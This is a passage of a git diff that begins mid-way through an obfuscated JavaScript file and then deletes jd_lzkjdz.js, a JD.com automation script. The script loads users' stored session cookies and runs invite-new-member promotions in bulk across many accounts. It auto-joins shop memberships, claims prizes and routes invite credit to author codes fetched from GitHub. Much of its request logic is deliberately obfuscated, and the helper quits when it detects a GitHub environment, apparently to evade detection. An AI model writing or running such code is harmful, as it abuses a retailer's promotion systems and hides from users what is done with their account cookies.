_0x23db17={'\x61\x70\x70\x49\x64':_0xad3eae[_0x27de('‫66')],'\x62\x6f\x64\x79':{'\x61\x70\x70\x69\x64':_0xad3eae[_0x27de('‫67')],'\x66\x75\x6e\x63\x74\x69\x6f\x6e\x49\x64':_0x1c2dc4,'\x62\x6f\x64\x79':JSON[_0x27de('‫8')](_0x38bbf9),'\x63\x6c\x69\x65\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e':_0xad3eae[_0x27de('‫68')],'\x63\x6c\x69\x65\x6e\x74':'\x48\x35','\x61\x63\x74\x69\x76\x69\x74\x79\x49\x64':$[_0x27de('‮24')]},'\x63\x61\x6c\x6c\x62\x61\x63\x6b\x41\x6c\x6c':!![]};let _0x2402da='';let _0x25911c=[_0xad3eae[_0x27de('‮69')]];if(process[_0x27de('‮51')][_0x27de('‫52')]){_0x2402da=process[_0x27de('‮51')][_0x27de('‫52')];}else{_0x2402da=_0x25911c[Math[_0x27de('‫6a')](_0xad3eae[_0x27de('‫6b')](Math[_0x27de('‫6c')](),_0x25911c[_0x27de('‮6d')]))];}let _0x5f5ad9={'\x75\x72\x6c':_0x27de('‮6e'),'\x62\x6f\x64\x79':JSON[_0x27de('‫8')](_0x23db17),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x2402da,'Content-Type':_0xad3eae[_0x27de('‮6f')]},'\x74\x69\x6d\x65\x6f\x75\x74':_0xad3eae[_0x27de('‫70')](0x1e,0x3e8)};$[_0x27de('‮71')](_0x5f5ad9,async(_0x4a1749,_0x300e08,_0x23db17)=>{if(_0x1c0efb[_0x27de('‫72')](_0x1c0efb[_0x27de('‫73')],_0x1c0efb[_0x27de('‫73')])){try{if(_0x4a1749){if(_0x1c0efb[_0x27de('‮74')](_0x1c0efb[_0x27de('‮75')],_0x1c0efb[_0x27de('‮76')])){_0x23db17=await geth5st[_0x27de('‮77')](this,arguments);}else{if(res[_0x27de('‮20')][_0x27de('‮21')]){$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}}else{}}catch(_0x580180){if(_0x1c0efb[_0x27de('‫78')](_0x1c0efb[_0x27de('‮79')],_0x1c0efb[_0x27de('‮79')])){$[_0x27de('‫7a')](_0x580180,_0x300e08);}else{if(_0x4a1749){console[_0x27de('‫1d')](_0x4a1749);}else{res=JSON[_0x27de('‫1e')](_0x23db17);if(res[_0x27de('‮1f')]){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}}}}finally{_0x1c0efb[_0x27de('‫7b')](_0x573221,_0x23db17);}}else{res=JSON[_0x27de('‫1e')](_0x23db17);if(res[_0x27de('‮1f')]){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}}});});};_0xod7='jsjiami.com.v6'; -function Env(t,e){"undefined"!=typeof process&&JSON.stringify(process.env).indexOf("GITHUB")>-1&&process.exit(0);class s{constructor(t){this.env=t}send(t,e="GET"){t="string"==typeof t?{url:t}:t;let s=this.get;return"POST"===e&&(s=this.post),new Promise((e,i)=>{s.call(this,t,(t,s,r)=>{t?i(t):e(s)})})}get(t){return this.send.call(this.env,t)}post(t){return this.send.call(this.env,t,"POST")}}return new class{constructor(t,e){this.name=t,this.http=new s(this),this.data=null,this.dataFile="box.dat",this.logs=[],this.isMute=!1,this.isNeedRewrite=!1,this.logSeparator="\n",this.startTime=(new Date).getTime(),Object.assign(this,e),this.log("",`🔔${this.name}, 开始!`)}isNode(){return"undefined"!=typeof module&&!!module.exports}isQuanX(){return"undefined"!=typeof $task}isSurge(){return"undefined"!=typeof $httpClient&&"undefined"==typeof $loon}isLoon(){return"undefined"!=typeof $loon}toObj(t,e=null){try{return JSON.parse(t)}catch{return e}}toStr(t,e=null){try{return JSON.stringify(t)}catch{return e}}getjson(t,e){let s=e;const i=this.getdata(t);if(i)try{s=JSON.parse(this.getdata(t))}catch{}return s}setjson(t,e){try{return this.setdata(JSON.stringify(t),e)}catch{return!1}}getScript(t){return new Promise(e=>{this.get({url:t},(t,s,i)=>e(i))})}runScript(t,e){return new Promise(s=>{let i=this.getdata("@chavy_boxjs_userCfgs.httpapi");i=i?i.replace(/\n/g,"").trim():i;let r=this.getdata("@chavy_boxjs_userCfgs.httpapi_timeout");r=r?1*r:20,r=e&&e.timeout?e.timeout:r;const[o,h]=i.split("@"),n={url:`http://${h}/v1/scripting/evaluate`,body:{script_text:t,mock_type:"cron",timeout:r},headers:{"X-Key":o,Accept:"*/*"}};this.post(n,(t,e,i)=>s(i))}).catch(t=>this.logErr(t))}loaddata(){if(!this.isNode())return{};{this.fs=this.fs?this.fs:require("fs"),this.path=this.path?this.path:require("path");const t=this.path.resolve(this.dataFile),e=this.path.resolve(process.cwd(),this.dataFile),s=this.fs.existsSync(t),i=!s&&this.fs.existsSync(e);if(!s&&!i)return{};{const i=s?t:e;try{return JSON.parse(this.fs.readFileSync(i))}catch(t){return{}}}}}writedata(){if(this.isNode()){this.fs=this.fs?this.fs:require("fs"),this.path=this.path?this.path:require("path");const t=this.path.resolve(this.dataFile),e=this.path.resolve(process.cwd(),this.dataFile),s=this.fs.existsSync(t),i=!s&&this.fs.existsSync(e),r=JSON.stringify(this.data);s?this.fs.writeFileSync(t,r):i?this.fs.writeFileSync(e,r):this.fs.writeFileSync(t,r)}}lodash_get(t,e,s){const i=e.replace(/\[(\d+)\]/g,".$1").split(".");let r=t;for(const t of i)if(r=Object(r)[t],void 0===r)return s;return r}lodash_set(t,e,s){return Object(t)!==t?t:(Array.isArray(e)||(e=e.toString().match(/[^.[\]]+/g)||[]),e.slice(0,-1).reduce((t,s,i)=>Object(t[s])===t[s]?t[s]:t[s]=Math.abs(e[i+1])>>0==+e[i+1]?[]:{},t)[e[e.length-1]]=s,t)}getdata(t){let e=this.getval(t);if(/^@/.test(t)){const[,s,i]=/^@(.*?)\.(.*?)$/.exec(t),r=s?this.getval(s):"";if(r)try{const t=JSON.parse(r);e=t?this.lodash_get(t,i,""):e}catch(t){e=""}}return e}setdata(t,e){let s=!1;if(/^@/.test(e)){const[,i,r]=/^@(.*?)\.(.*?)$/.exec(e),o=this.getval(i),h=i?"null"===o?null:o||"{}":"{}";try{const e=JSON.parse(h);this.lodash_set(e,r,t),s=this.setval(JSON.stringify(e),i)}catch(e){const o={};this.lodash_set(o,r,t),s=this.setval(JSON.stringify(o),i)}}else s=this.setval(t,e);return s}getval(t){return this.isSurge()||this.isLoon()?$persistentStore.read(t):this.isQuanX()?$prefs.valueForKey(t):this.isNode()?(this.data=this.loaddata(),this.data[t]):this.data&&this.data[t]||null}setval(t,e){return this.isSurge()||this.isLoon()?$persistentStore.write(t,e):this.isQuanX()?$prefs.setValueForKey(t,e):this.isNode()?(this.data=this.loaddata(),this.data[e]=t,this.writedata(),!0):this.data&&this.data[e]||null}initGotEnv(t){this.got=this.got?this.got:require("got"),this.cktough=this.cktough?this.cktough:require("tough-cookie"),this.ckjar=this.ckjar?this.ckjar:new this.cktough.CookieJar,t&&(t.headers=t.headers?t.headers:{},void 0===t.headers.Cookie&&void 0===t.cookieJar&&(t.cookieJar=this.ckjar))}get(t,e=(()=>{})){t.headers&&(delete t.headers["Content-Type"],delete t.headers["Content-Length"]),this.isSurge()||this.isLoon()?(this.isSurge()&&this.isNeedRewrite&&(t.headers=t.headers||{},Object.assign(t.headers,{"X-Surge-Skip-Scripting":!1})),$httpClient.get(t,(t,s,i)=>{!t&&s&&(s.body=i,s.statusCode=s.status),e(t,s,i)})):this.isQuanX()?(this.isNeedRewrite&&(t.opts=t.opts||{},Object.assign(t.opts,{hints:!1})),$task.fetch(t).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>e(t))):this.isNode()&&(this.initGotEnv(t),this.got(t).on("redirect",(t,e)=>{try{if(t.headers["set-cookie"]){const s=t.headers["set-cookie"].map(this.cktough.Cookie.parse).toString();s&&this.ckjar.setCookieSync(s,null),e.cookieJar=this.ckjar}}catch(t){this.logErr(t)}}).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>{const{message:s,response:i}=t;e(s,i,i&&i.body)}))}post(t,e=(()=>{})){if(t.body&&t.headers&&!t.headers["Content-Type"]&&(t.headers["Content-Type"]="application/x-www-form-urlencoded"),t.headers&&delete t.headers["Content-Length"],this.isSurge()||this.isLoon())this.isSurge()&&this.isNeedRewrite&&(t.headers=t.headers||{},Object.assign(t.headers,{"X-Surge-Skip-Scripting":!1})),$httpClient.post(t,(t,s,i)=>{!t&&s&&(s.body=i,s.statusCode=s.status),e(t,s,i)});else if(this.isQuanX())t.method="POST",this.isNeedRewrite&&(t.opts=t.opts||{},Object.assign(t.opts,{hints:!1})),$task.fetch(t).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>e(t));else if(this.isNode()){this.initGotEnv(t);const{url:s,...i}=t;this.got.post(s,i).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>{const{message:s,response:i}=t;e(s,i,i&&i.body)})}}time(t,e=null){const s=e?new Date(e):new Date;let i={"M+":s.getMonth()+1,"d+":s.getDate(),"H+":s.getHours(),"m+":s.getMinutes(),"s+":s.getSeconds(),"q+":Math.floor((s.getMonth()+3)/3),S:s.getMilliseconds()};/(y+)/.test(t)&&(t=t.replace(RegExp.$1,(s.getFullYear()+"").substr(4-RegExp.$1.length)));for(let e in i)new RegExp("("+e+")").test(t)&&(t=t.replace(RegExp.$1,1==RegExp.$1.length?i[e]:("00"+i[e]).substr((""+i[e]).length)));return t}msg(e=t,s="",i="",r){const o=t=>{if(!t)return t;if("string"==typeof t)return this.isLoon()?t:this.isQuanX()?{"open-url":t}:this.isSurge()?{url:t}:void 0;if("object"==typeof t){if(this.isLoon()){let e=t.openUrl||t.url||t["open-url"],s=t.mediaUrl||t["media-url"];return{openUrl:e,mediaUrl:s}}if(this.isQuanX()){let e=t["open-url"]||t.url||t.openUrl,s=t["media-url"]||t.mediaUrl;return{"open-url":e,"media-url":s}}if(this.isSurge()){let e=t.url||t.openUrl||t["open-url"];return{url:e}}}};if(this.isMute||(this.isSurge()||this.isLoon()?$notification.post(e,s,i,o(r)):this.isQuanX()&&$notify(e,s,i,o(r))),!this.isMuteLog){let t=["","==============📣系统通知📣=============="];t.push(e),s&&t.push(s),i&&t.push(i),console.log(t.join("\n")),this.logs=this.logs.concat(t)}}log(...t){t.length>0&&(this.logs=[...this.logs,...t]),console.log(t.join(this.logSeparator))}logErr(t,e){const s=!this.isSurge()&&!this.isQuanX()&&!this.isLoon();s?this.log("",`❗️${this.name}, 错误!`,t.stack):this.log("",`❗️${this.name}, 错误!`,t)}wait(t){return new Promise(e=>setTimeout(e,t))}done(t={}){const e=(new Date).getTime(),s=(e-this.startTime)/1e3;this.log("",`🔔${this.name}, 结束! 🕛 ${s} 秒`),this.log(),(this.isSurge()||this.isQuanX()||this.isLoon())&&$done(t)}}(t,e)} diff --git a/jd_lzkjdz.js b/jd_lzkjdz.js deleted file mode 100644 index 52655aa..0000000 --- a/jd_lzkjdz.js +++ /dev/null @@ -1,459 +0,0 @@ -/* -脚本加密,不喜欢勿跑 - -*/ -const $ = new Env("雅诗兰黛"); -const jdCookieNode = $.isNode() ? require('./jdCookie.js') : ''; -const notify = $.isNode() ? require('./sendNotify') : ''; -let cookiesArr = [], cookie = '', message = ''; -let ownCode = null; -let authorCodeList = [] -if ($.isNode()) { - Object.keys(jdCookieNode).forEach((item) => { - cookiesArr.push(jdCookieNode[item]) - }) - if (process.env.JD_DEBUG && process.env.JD_DEBUG === 'false') console.log = () => { }; -} else { - let cookiesData = $.getdata('CookiesJD') || "[]"; - cookiesData = JSON.parse(cookiesData); - cookiesArr = cookiesData.map(item => item.cookie); - cookiesArr.reverse(); - cookiesArr.push(...[$.getdata('CookieJD2'), $.getdata('CookieJD')]); - cookiesArr.reverse(); - cookiesArr = cookiesArr.filter(item => !!item); -} - -!(async () => { - $.getAuthorCodeListerr = false - if (!cookiesArr[0]) { - $.msg($.name, '【提示】请先获取京东账号一cookie\n直接使用NobyDa的京东签到获取', 'https://bean.m.jd.com/bean/signIndex.action', { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - return; - } - authorCodeList = await getAuthorCodeList('https://raw.githubusercontent.com/okyyds/duck/master/code/lzkjdz.json') - if ($.getAuthorCodeListerr === false) { - authorCodeList = [ - 'eaee1e93884f4b008b2ff630cb5031b2', - ] - } - for (let i = 0; i < cookiesArr.length; i++) { - if (cookiesArr[i]) { - cookie = cookiesArr[i] - originCookie = cookiesArr[i] - newCookie = '' - $.UserName = decodeURIComponent(cookie.match(/pt_pin=(.+?);/) && cookie.match(/pt_pin=(.+?);/)[1]) - $.index = i + 1; - $.isLogin = true; - $.nickName = ''; - await checkCookie(); - console.log(`\n******开始【京东账号${$.index}】${$.nickName || $.UserName}*********\n`); - if (!$.isLogin) { - $.msg($.name, `【提示】cookie已失效`, `京东账号${$.index} ${$.nickName || $.UserName}\n请重新登录获取\nhttps://bean.m.jd.com/bean/signIndex.action`, { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - // if ($.isNode()) { - // await notify.sendNotify(`${$.name}cookie已失效 - ${$.UserName}`, `京东账号${$.index} ${$.UserName}\n请重新登录获取cookie`); - // } - continue - } - $.bean = 0; - $.ADID = getUUID('xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx', 1); - $.UUID = getUUID('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'); - // authorCodeList = [ - // 'eaee1e93884f4b008b2ff630cb5031b2', - // '5ebde0a8cd9a4b36aab2d602d6eb365b', - // 'fd9e4abc20c34a1ebe642e237b49a947' - // ] - // $.authorCode = authorCodeList[random(0, authorCodeList.length)] - $.authorCode = ownCode ? ownCode : authorCodeList[random(0, authorCodeList.length)] - $.authorNum = `${random(1000000, 9999999)}` - $.randomCode = random(1000000, 9999999) - $.activityId = '2206100037674501' - $.activityShopId = '1000376745' - $.activityUrl = `https://lzkjdz-isv.isvjcloud.com/esteelauder/inviteNew/activityPage?activityId=${$.activityId}&inviterUuid=${encodeURIComponent($.authorCode)}&shareuserid4minipg=${encodeURIComponent($.secretPin)}&sid=&un_area=` - await member(); - await $.wait(1000) - if ($.bean > 0) { - message += `\n【京东账号${$.index}】${$.nickName || $.UserName} \n └ 获得 ${$.bean} 京豆。` - } - } - } - if (message !== '') { - if ($.isNode()) { - await notify.sendNotify($.name, message, '', `\n`); - } else { - $.msg($.name, '有点儿收获', message); - } - } -})() - .catch((e) => { - $.log('', `❌ ${$.name}, 失败! 原因: ${e}!`, '') - }) - .finally(() => { - $.done(); - }) - - -async function member() { - $.token = null; - $.secretPin = null; - $.openCardActivityId = null - lz_cookie = {} - await getFirstLZCK() - await getToken(); - await task('customer/getSimpleActInfoVo', `activityId=${$.activityId}`, 1) - // console.log($.token) - if ($.token) { - await getMyPing(); - if ($.secretPin) { - console.log("去助力 -> " + $.authorCode) - await taskaccessLog('common/accessLogWithAD', `venderId=${$.activityShopId}&code=99&pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&pageUrl=${$.activityUrl}&subType=app&adSource=null`, 1); - // await task('wxActionCommon/getUserInfo', `pin=${encodeURIComponent($.secretPin)}`, 1) - await $.wait(1000) - console.log(cookie) - if ($.index === 1) { - await task('inviteNew/activityContent', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&inviterUuid=${encodeURIComponent($.authorCode)}`, 0, 1) - } else { - await task('inviteNew/activityContent', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&inviterUuid=${encodeURIComponent($.authorCode)}`) - } - $.log("加入店铺会员") - await getShopOpenCardInfo({ "venderId": `${$.activityShopId}`, "channel": "401" }, $.activityShopId) - await bindWithVender({ "venderId": `${$.activityShopId}`, "bindByVerifyCodeFlag": 1, "registerExtend": {}, "writeChildFlag": 0, "activityId": $.openCardActivityId, "channel": 7012 }, $.activityShopId) - await $.wait(1000) - if ($.index === 1) { - await task('inviteNew/activityContent', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&inviterUuid=${encodeURIComponent($.authorCode)}`, 0, 1) - } else { - await task('inviteNew/activityContent', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&inviterUuid=${encodeURIComponent($.authorCode)}`) - } - await task('inviteNew/convertPrize', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&uuid=${$.uuid}`) - } - } -} - -function task(function_id, body, isCommon = 0, own = 0) { - return new Promise(resolve => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.result) { - switch (function_id) { - case 'customer/getSimpleActInfoVo': - console.log(data) - break; - case 'wxActionCommon/getUserInfo': - break; - case 'inviteNew/convertPrize': - console.log(data) - break; - case 'inviteNew/activityContent': - console.log(data.data.userRecord.uuid) - $.uuid = data.data.userRecord.uuid - if ($.index === 1) { - ownCode = data.data.userRecord.uuid - // console.log(ownCode) - } - break; - default: - // $.log(JSON.stringify(data)) - break; - } - } else { - // $.log(JSON.stringify(data)) - } - } else { - // $.log("京东没有返回数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - }) - }) -} -function taskaccessLog(function_id, body, isCommon = 0) { - return new Promise(resolve => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - // console.log(resp); - if (resp['headers']['set-cookie']) { - cookie = `${originCookie};` - for (let sk of resp['headers']['set-cookie']) { - lz_cookie[sk.split(";")[0].substr(0, sk.split(";")[0].indexOf("="))] = sk.split(";")[0].substr(sk.split(";")[0].indexOf("=") + 1) - } - for (const vo of Object.keys(lz_cookie)) { - cookie += vo + '=' + lz_cookie[vo] + ';' - } - } - } - } catch (error) { - console.log(error) - } finally { - resolve(); - } - }) - }) -} - -function getAuthorCodeList(url) { - return new Promise(resolve => { - const options = { - url: `${url}?${new Date()}`, "timeout": 10000, headers: { - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Edg/87.0.4280.88" - } - }; - $.get(options, async (err, resp, data) => { - try { - if (err) { - // $.log(err) - $.getAuthorCodeListerr = false - } else { - if (data) data = JSON.parse(data) - $.getAuthorCodeListerr = true - } - } catch (e) { - $.logErr(e, resp) - data = null; - } finally { - resolve(data); - } - }) - }) -} - -function taskUrl(function_id, body, isCommon) { - return { - url: isCommon ? `https://lzkjdz-isv.isvjcloud.com/${function_id}` : `https://lzkjdz-isv.isvjcloud.com/esteelauder/${function_id}`, - headers: { - Host: 'lzkjdz-isv.isvjcloud.com', - Accept: 'application/json', - 'X-Requested-With': 'XMLHttpRequest', - 'Accept-Language': 'zh-cn', - 'Accept-Encoding': 'gzip, deflate, br', - 'Content-Type': 'application/x-www-form-urlencoded', - Origin: 'https://lzkjdz-isv.isvjcloud.com', - 'User-Agent': `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: 'keep-alive', - Referer: $.activityUrl, - Cookie: $.cookie - }, - body: body - - } -} - -function getMyPing() { - let opt = { - url: `https://lzkjdz-isv.isvjcloud.com/customer/getMyPing`, - headers: { - Host: 'lzkjdz-isv.isvjcloud.com', - Accept: 'application/json', - 'X-Requested-With': 'XMLHttpRequest', - 'Accept-Language': 'zh-cn', - 'Accept-Encoding': 'gzip, deflate, br', - 'Content-Type': 'application/x-www-form-urlencoded', - Origin: 'https://lzkjdz-isv.isvjcloud.com', - 'User-Agent': `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: 'keep-alive', - Referer: $.activityUrl, - Cookie: cookie, - }, - body: `userId=${$.activityShopId}&token=${$.token}&fromType=APP&riskType=1` - } - return new Promise(resolve => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - if (resp['headers']['set-cookie']) { - cookie = `${originCookie}` - if ($.isNode()) { - for (let sk of resp['headers']['set-cookie']) { - cookie = `${cookie}${sk.split(";")[0]};` - } - } else { - for (let ck of resp['headers']['Set-Cookie'].split(',')) { - cookie = `${cookie}${ck.split(";")[0]};` - } - } - } - if (resp['headers']['Set-Cookie']) { - cookie = `${originCookie}` - if ($.isNode()) { - for (let sk of resp['headers']['set-cookie']) { - cookie = `${cookie}${sk.split(";")[0]};` - } - } else { - for (let ck of resp['headers']['Set-Cookie'].split(',')) { - cookie = `${cookie}${ck.split(";")[0]};` - } - } - } - if (data) { - data = JSON.parse(data) - if (data.result) { - $.log(`你好:${data.data.nickname}`) - $.pin = data.data.nickname; - $.secretPin = data.data.secretPin; - cookie = `${cookie};AUTH_C_USER=${data.data.secretPin}` - } else { - $.log(data.errorMessage) - } - } else { - $.log("京东返回了空数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - - }) - }) -} -function getFirstLZCK() { - return new Promise(resolve => { - $.get({ url: $.activityUrl ,headers:{"user-agent":$.isNode() ? (process.env.JD_USER_AGENT ? process.env.JD_USER_AGENT : (require('./USER_AGENTS').USER_AGENT)) : ($.getdata('JDUA') ? $.getdata('JDUA') : "jdapp;iPhone;9.4.4;14.3;network/4g;Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1")}}, (err, resp, data) => { - try { - if (err) { - console.log(err) - } else { - if (resp['headers']['set-cookie']) { - cookie = `${originCookie}` - if ($.isNode()) { - for (let sk of resp['headers']['set-cookie']) { - cookie = `${cookie}${sk.split(";")[0]};` - } - } else { - for (let ck of resp['headers']['Set-Cookie'].split(',')) { - cookie = `${cookie}${ck.split(";")[0]};` - } - } - } - if (resp['headers']['Set-Cookie']) { - cookie = `${originCookie}` - if ($.isNode()) { - for (let sk of resp['headers']['set-cookie']) { - cookie = `${cookie}${sk.split(";")[0]};` - } - } else { - for (let ck of resp['headers']['Set-Cookie'].split(',')) { - cookie = `${cookie}${ck.split(";")[0]};` - } - } - } - $.cookie = cookie - } - } catch (error) { - console.log(error) - } finally { - resolve(); - } - }) - }) -} -function getToken() { - let opt = { - url: `https://api.m.jd.com/client.action?functionId=isvObfuscator`, - headers: { - Host: 'api.m.jd.com', - 'Content-Type': 'application/x-www-form-urlencoded', - Accept: '*/*', - Connection: 'keep-alive', - Cookie: cookie, - 'User-Agent': 'JD4iPhone/167650 (iPhone; iOS 13.7; Scale/3.00)', - 'Accept-Language': 'zh-Hans-CN;q=1', - 'Accept-Encoding': 'gzip, deflate, br', - }, - body: `body=%7B%22url%22%3A%20%22https%3A//lzkj-isv.isvjcloud.com%22%2C%20%22id%22%3A%20%22%22%7D&uuid=hjudwgohxzVu96krv&client=apple&clientVersion=9.4.0&st=1620476162000&sv=111&sign=f9d1b7e3b943b6a136d54fe4f892af05` - } - return new Promise(resolve => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.code === "0") { - $.token = data.token - } - } else { - $.log("京东返回了空数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - }) - }) -} -function random(min, max) { - - return Math.floor(Math.random() * (max - min)) + min; - -} -function getUUID(format = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', UpperCase = 0) { - return format.replace(/[xy]/g, function (c) { - var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8); - if (UpperCase) { - uuid = v.toString(36).toUpperCase(); - } else { - uuid = v.toString(36) - } - return uuid; - }); -} -function checkCookie() { - const options = { - url: "https://me-api.jd.com/user_new/info/GetJDUserInfoUnion", - headers: { - "Host": "me-api.jd.com", - "Accept": "*/*", - "Connection": "keep-alive", - "Cookie": cookie, - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1", - "Accept-Language": "zh-cn", - "Referer": "https://home.m.jd.com/myJd/newhome.action?sceneval=2&ufc=&", - "Accept-Encoding": "gzip, deflate, br", - } - }; - return new Promise(resolve => { - $.get(options, (err, resp, data) => { - try { - if (err) { - $.logErr(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.retcode === "1001") { - $.isLogin = false; //cookie过期 - return; - } - if (data.retcode === "0" && data.data.hasOwnProperty("userInfo")) { - $.nickName = data.data.userInfo.baseInfo.nickname; - } - } else { - $.log('京东返回了空数据'); - } - } - } catch (e) { - $.logErr(e) - } finally { - resolve(); - } - }) - }) -} -// prettier-ignore -var _0xod7='jsjiami.com.v6',_0xod7_=['‮_0xod7'],_0x1acd=[_0xod7,'\x53\x33\x4a\x54\x56\x32\x4d\x3d','\x54\x47\x4e\x4c\x62\x6e\x6b\x3d','\x62\x47\x39\x6e','\x63\x47\x46\x79\x63\x32\x55\x3d','\x63\x33\x56\x6a\x59\x32\x56\x7a\x63\x77\x3d\x3d','\x63\x6d\x56\x7a\x64\x57\x78\x30','\x61\x57\x35\x30\x5a\x58\x4a\x6c\x63\x33\x52\x7a\x55\x6e\x56\x73\x5a\x55\x78\x70\x63\x33\x51\x3d','\x62\x33\x42\x6c\x62\x6b\x4e\x68\x63\x6d\x52\x42\x59\x33\x52\x70\x64\x6d\x6c\x30\x65\x55\x6c\x6b','\x61\x57\x35\x30\x5a\x58\x4a\x6c\x63\x33\x52\x7a\x53\x57\x35\x6d\x62\x77\x3d\x3d','\x59\x57\x4e\x30\x61\x58\x5a\x70\x64\x48\x6c\x4a\x5a\x41\x3d\x3d','\x56\x45\x56\x4a\x59\x57\x38\x3d','\x55\x6d\x78\x6d\x59\x32\x4d\x3d','\x63\x45\x39\x31\x52\x6b\x4d\x3d','\x64\x6e\x5a\x75\x57\x45\x4d\x3d','\x62\x33\x64\x32\x5a\x47\x55\x3d','\x59\x33\x70\x4b\x62\x47\x67\x3d','\x51\x55\x64\x59\x59\x30\x6b\x3d','\x54\x30\x4a\x58\x55\x45\x59\x3d','\x56\x57\x6c\x55\x51\x33\x63\x3d','\x59\x6d\x6c\x75\x5a\x46\x64\x70\x64\x47\x68\x57\x5a\x57\x35\x6b\x5a\x58\x49\x3d','\x52\x57\x52\x36\x62\x57\x67\x3d','\x55\x48\x56\x58\x62\x6b\x59\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x68\x63\x47\x6b\x75\x62\x53\x35\x71\x5a\x43\x35\x6a\x62\x32\x30\x76\x59\x32\x78\x70\x5a\x57\x35\x30\x4c\x6d\x46\x6a\x64\x47\x6c\x76\x62\x6a\x38\x3d','\x52\x33\x5a\x75\x55\x6c\x55\x3d','\x52\x6c\x5a\x71\x53\x30\x55\x3d','\x56\x47\x35\x69\x63\x30\x73\x3d','\x61\x6e\x6c\x47\x54\x31\x41\x3d','\x66\x53\x5a\x6a\x61\x47\x46\x75\x62\x6d\x56\x73\x50\x54\x51\x77\x4d\x53\x5a\x79\x5a\x58\x52\x31\x63\x6d\x35\x56\x63\x6d\x77\x39','\x59\x55\x78\x36\x61\x31\x63\x3d','\x56\x6d\x74\x75\x62\x33\x51\x3d','\x54\x56\x6c\x6f\x54\x45\x4d\x3d','\x62\x58\x64\x34\x52\x47\x30\x3d','\x65\x6c\x5a\x70\x59\x57\x34\x3d','\x52\x55\x46\x4a\x51\x6b\x45\x3d','\x53\x57\x70\x7a\x59\x6b\x6f\x3d','\x56\x55\x74\x79\x61\x46\x55\x3d','\x56\x32\x74\x69\x53\x45\x77\x3d','\x54\x46\x4a\x49\x61\x6b\x77\x3d','\x54\x30\x4e\x44\x54\x6e\x63\x3d','\x56\x31\x70\x7a\x57\x56\x6f\x3d','\x56\x33\x4e\x72\x63\x48\x67\x3d','\x61\x56\x42\x6b\x5a\x58\x67\x3d','\x51\x6e\x64\x6c\x55\x31\x63\x3d','\x65\x57\x35\x5a\x63\x58\x49\x3d','\x63\x47\x74\x50\x64\x58\x4d\x3d','\x57\x6d\x56\x5a\x62\x6c\x67\x3d','\x61\x56\x68\x4e\x54\x33\x6b\x3d','\x62\x56\x5a\x33\x65\x56\x67\x3d','\x55\x47\x4a\x50\x51\x55\x49\x3d','\x54\x33\x68\x74\x56\x57\x59\x3d','\x62\x55\x31\x52\x61\x33\x59\x3d','\x53\x57\x4a\x45\x62\x56\x45\x3d','\x59\x6d\x6c\x75\x5a\x46\x64\x70\x64\x47\x68\x57\x5a\x57\x35\x6b\x5a\x58\x4a\x74\x5a\x58\x4e\x7a\x59\x57\x64\x6c','\x62\x57\x56\x7a\x63\x32\x46\x6e\x5a\x51\x3d\x3d','\x5a\x57\x35\x32','\x55\x30\x6c\x48\x54\x6c\x39\x56\x55\x6b\x77\x3d','\x59\x6d\x52\x6e\x63\x30\x